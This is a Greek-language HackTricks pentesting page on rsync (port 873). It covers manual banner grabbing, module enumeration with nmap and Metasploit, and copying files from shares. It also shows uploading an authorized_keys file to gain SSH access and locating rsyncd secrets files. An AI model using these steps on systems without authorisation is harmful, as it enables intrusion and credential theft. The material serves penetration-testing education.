9.1 KiB
873 - Ελέγχος ασφάλειας Rsync
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι υποστήριξης του HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε The PEASS Family, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.
Βασικές Πληροφορίες
Από την wikipedia:
Το rsync είναι ένα εργαλείο για την αποτελεσματική μεταφορά και συγχρονισμό αρχείων μεταξύ ενός υπολογιστή και ενός εξωτερικού σκληρού δίσκου και ανάμεσα σε δικτυωμένους υπολογιστές συγκρίνοντας τους χρόνους τροποποίησης και το μέγεθος των αρχείων.[3] Συνήθως βρίσκεται σε λειτουργικά συστήματα τύπου Unix-like. Ο αλγόριθμος rsync είναι ένας τύπος κωδικοποίησης delta και χρησιμοποιείται για την ελαχιστοποίηση της χρήσης του δικτύου. Zlib μπορεί να χρησιμοποιηθεί για επιπλέον συμπίεση δεδομένων,[3] και οι πρωτόκολλοι SSH ή stunnel μπορούν να χρησιμοποιηθούν για την ασφάλεια.
Προεπιλεγμένη θύρα: 873
PORT STATE SERVICE REASON
873/tcp open rsync syn-ack
Απαρίθμηση
Μπάνερ & Επικοινωνία με το χέρι
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0 <--- You receive this banner with the version from the server
@RSYNCD: 31.0 <--- Then you send the same info
#list <--- Then you ask the sever to list
raidroot <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID <--- Enumeration finished
@RSYNCD: EXIT <--- Sever closes the connection
#Now lets try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password
Απαρίθμηση Κοινόχρηστων Φακέλων
Τα Rsync modules αναγνωρίζονται ως κοινόχρηστοι φάκελοι που μπορεί να είναι προστατευμένοι με κωδικούς πρόσβασης. Για να εντοπίσουμε τα διαθέσιμα modules και να ελέγξουμε αν απαιτούν κωδικούς πρόσβασης, χρησιμοποιούνται οι παρακάτω εντολές:
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list
# Example with IPv6 and alternate port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
Να είστε προσεκτικοί, καθώς ορισμένα κοινόχρηστα ενδέχεται να μην εμφανίζονται στη λίστα, κρύβοντάς τα πιθανώς. Επιπλέον, η πρόσβαση σε ορισμένα κοινόχρηστα ενδέχεται να περιορίζεται σε συγκεκριμένα διαπιστευτήρια, όπως υποδεικνύεται από ένα μήνυμα "Άρνηση πρόσβασης".
Βίαιη Δύναμη
Χειροκίνητη Χρήση του Rsync
Μετά την απόκτηση μιας λίστας ενοτήτων, οι ενέργειες εξαρτώνται από το αν απαιτείται πιστοποίηση. Χωρίς πιστοποίηση, η εμφάνιση και η αντιγραφή αρχείων από ένα κοινόχρηστο φάκελο σε ένα τοπικό κατάλογο επιτυγχάνεται μέσω:
# Listing a shared folder
rsync -av --list-only rsync://192.168.0.123/shared_name
# Copying files from a shared folder
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
Αυτή η διαδικασία μεταφέρει αναδρομικά αρχεία, διατηρώντας τα χαρακτηριστικά και τις άδειες τους.
Με διαπιστευτήρια, η λίστα και η λήψη από ένα κοινόχρηστο φάκελο μπορούν να γίνουν ως εξής, όπου θα εμφανιστεί ένα παράθυρο εισαγωγής κωδικού πρόσβασης:
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
Για να ανεβάσετε περιεχόμενο, όπως ένα αρχείο authorized_keys για πρόσβαση, χρησιμοποιήστε:
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
POST
Για να εντοπίσετε το αρχείο ρύθμισης του rsyncd, εκτελέστε:
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
Μέσα σε αυτό το αρχείο, ένα παράμετρος secrets file μπορεί να δείχνει σε ένα αρχείο που περιέχει ονόματα χρηστών και κωδικούς πρόσβασης για την επαλήθευση του rsyncd.
Αναφορές
Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε The PEASS Family, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα κόλπα σας για το hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.